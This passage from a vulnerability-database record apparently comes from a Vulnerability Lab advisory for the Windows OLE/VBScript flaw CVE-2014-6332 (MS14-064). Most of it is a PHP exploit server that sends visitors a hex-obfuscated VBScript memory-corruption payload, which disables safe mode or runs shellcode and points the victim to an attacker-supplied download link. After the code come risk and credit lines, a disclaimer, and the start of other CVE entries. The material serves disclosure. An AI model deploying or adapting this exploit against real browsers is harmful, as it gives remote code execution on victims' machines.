"\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28".\r\n "\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a".\r\n "\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a".\r\n "\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65".\r\n 
"\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22".\r\n "\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20".\r\n "\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69".\r\n "\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22".\r\n "\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e".\r\n "\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20".\r\n "\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65".\r\n "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f".\r\n "\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65".\r\n "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a".\r\n "\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61".\r\n "\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61".\r\n "\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68".\r\n "\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30".\r\n "\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72".\r\n "\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61".\r\n "\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68".\r\n "\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28".\r\n 
"\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f".\r\n "\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75".\r\n "\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69".\r\n "\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e".\r\n "\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29".\r\n "\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d".\r\n "\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69".\r\n "\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f".\r\n "\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a".\r\n "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33".\r\n "\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e".\r\n "\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66".\r\n "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45".\r\n "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20".\r\n "\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72".\r\n "\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76".\r\n 
"\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43".\r\n "\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20".\r\n "\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74".\r\n "\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74".\r\n "\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e".\r\n "\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45".\r\n "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69".\r\n "\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20".\r\n "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32".\r\n "\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a".\r\n "\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30".\r\n "\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d".\r\n "\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61".\r\n "\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34".\r\n "\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61".\r\n "\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50".\r\n "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75".\r\n "\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20".\r\n "\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e".\r\n 
"\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20".\r\n "\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28".\r\n "\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20".\r\n "\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20".\r\n "\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d".\r\n "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b".\r\n "\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e".\r\n "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64".\r\n "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28".\r\n "\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20".\r\n "\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68".\r\n "\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20".\r\n "\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37".\r\n 
"\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75".\r\n "\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d".\r\n "\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20".\r\n "\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20".\r\n "\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33".\r\n "\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30".\r\n "\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20".\r\n "\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20".\r\n "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30".\r\n "\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20".\r\n "\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65".\r\n "\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74".\r\n "\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34".\r\n "\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38".\r\n "\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28".\r\n "\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d".\r\n "\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29".\r\n "\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69".\r\n 
"\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61".\r\n "\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28".\r\n "\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29".\r\n "\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66".\r\n "\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20".\r\n "\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d".\r\n "\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74".\r\n "\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65".\r\n "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20".\r\n "\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20".\r\n "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69".\r\n 
"\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20".\r\n "\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46".\r\n "\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28".\r\n "\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20".\r\n "\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65".\r\n "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49".\r\n "\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20".\r\n "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72".\r\n "\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a".\r\n "\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65".\r\n "\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a".\r\n "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45".\r\n "\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50".\r\n "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".\r\n "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f".\r\n 
"\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20".\r\n "\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65".\r\n "\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20".\r\n "\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29".\r\n "\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20".\r\n "\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36".\r\n "\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20".\r\n "\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20".\r\n "\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64".\r\n "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64".\r\n "\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d".\r\n "\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e";\r\n $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd);\r\n \r\n for (;;) {\r\n if ($client = @socket_accept($reza)) {\r\n socket_write($client, "HTTP/1.1 200 OK\r\n" .\r\n "Content-length: " . strlen($msgd) . "\r\n" .\r\n "Content-Type: text/html; charset=UTF-8\r\n\r\n" .\r\n $msgd);\r\n print "\n Target Checked Your Link \n";\r\n }\r\n else usleep(100000);\r\n }\r\n \r\n \r\n ?>\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the security vulnerability in the html hta application is estimated as high. 
(CVSS 9.3)\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nAuthor: Mohammad Reza Espargham\r\nLinkedin: https://ir.linkedin.com/in/rezasp\r\nE-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com\r\nWebsite: www.reza.es\r\nTwitter: https://twitter.com/rezesp\r\nFaceBook: https://www.facebook.com/mohammadreza.espargham\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either \r\nexpressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers \r\nare not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even \r\nif Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation \r\nof liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break \r\nany vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t \t\t- www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t \t\t- admin@evolution-sec.com\r\nSection: dev.vulnerability-db.com\t \t- forum.vulnerability-db.com \t\t \t\t- magazine.vulnerability-db.com\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t \t\t- youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php \t\t- vulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php\t- vulnerability-lab.com/register/\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to \r\nelectronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website \r\nis trademark of vulnerability-lab team & the specific authors or managers. 
To record, list (feed), modify, use or edit our material contact \r\n(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2014 | Vulnerability Laboratory [Evolution Security]\r\n\r\n\r\n\r\n-- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-08-24T00:00:00", "title": "Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-08-24T00:00:00", "id": "SECURITYVULNS:DOC:32398", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32398", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:16:46", "description": "Information leakage, multiple use-after-free vulnerabilities", "edition": 2, "cvss3": {}, "published": "2013-05-27T00:00:00", "title": "Microsoft Internet Explorer multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-1307", "CVE-2013-1311", "CVE-2013-1308", "CVE-2013-0811", "CVE-2013-3140", "CVE-2013-2551", "CVE-2013-1347", "CVE-2013-1309", "CVE-2013-1306", "CVE-2013-1312", "CVE-2013-1297", "CVE-2013-1310"], "modified": "2013-05-27T00:00:00", "id": "SECURITYVULNS:VULN:13082", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13082", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:16:45", "description": "OLE code execution, Internet Explorer multiple vulnerabilities, Schannel code execution, XML Core Services code execution, TCP/IP privilege escalation, Windows Audio Service privilege escalation, 
